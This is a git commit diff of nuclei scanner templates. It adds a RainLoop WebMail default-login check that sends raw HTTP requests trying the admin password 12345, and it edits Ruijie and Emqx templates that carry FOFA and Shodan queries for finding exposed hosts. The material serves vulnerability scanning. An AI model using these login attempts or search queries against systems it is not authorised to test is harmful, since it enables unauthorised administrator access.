Create rainloop-default-login.yaml (#4001)
* Create rainloop-default-login.yaml * misc updates * misc fixes Co-authored-by: sandeep <sandeep@projectdiscovery.io>patch-1
parent
21490cbdd0
commit
24b76fd68c
|
@ -7,7 +7,7 @@ info:
|
|||
description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.
|
||||
reference: https://www.adminxe.com/2163.html
|
||||
metadata:
|
||||
fofa-query: title="RG-UACç»å½é¡µé¢"
|
||||
fofa-query: 'title="RG-UAC登录页面"'
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
|
|
|
@ -6,8 +6,7 @@ info:
|
|||
severity: high
|
||||
description: Emqx default admin credentials were discovered.
|
||||
metadata:
|
||||
name: Emqx Default Login
|
||||
shodan-query: http.favicon.hash:"-670975485"
|
||||
shodan-query: 'http.favicon.hash:"-670975485"'
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
|
|
|
@ -0,0 +1,52 @@
|
|||
id: rainloop-default-login
|
||||
|
||||
info:
|
||||
name: Rainloop WebMail Default Login
|
||||
author: For3stCo1d
|
||||
severity: high
|
||||
reference: https://github.com/RainLoop/rainloop-webmail/issues/28
|
||||
metadata:
|
||||
fofa-query: app="RAINLOOP-WebMail"
|
||||
tags: rainloop,webmail,default-login,foss
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- | # Login Portal: /?admin
|
||||
GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /?/Ajax/&q[]=/0/ HTTP/2
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
user:
|
||||
- admin
|
||||
|
||||
pass:
|
||||
- 12345
|
||||
|
||||
cookie-reuse: true
|
||||
extractors:
|
||||
- type: regex
|
||||
name: token
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- 'token":"(.+?)"'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"Action":"AdminLogin"'
|
||||
- '"Result":true'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue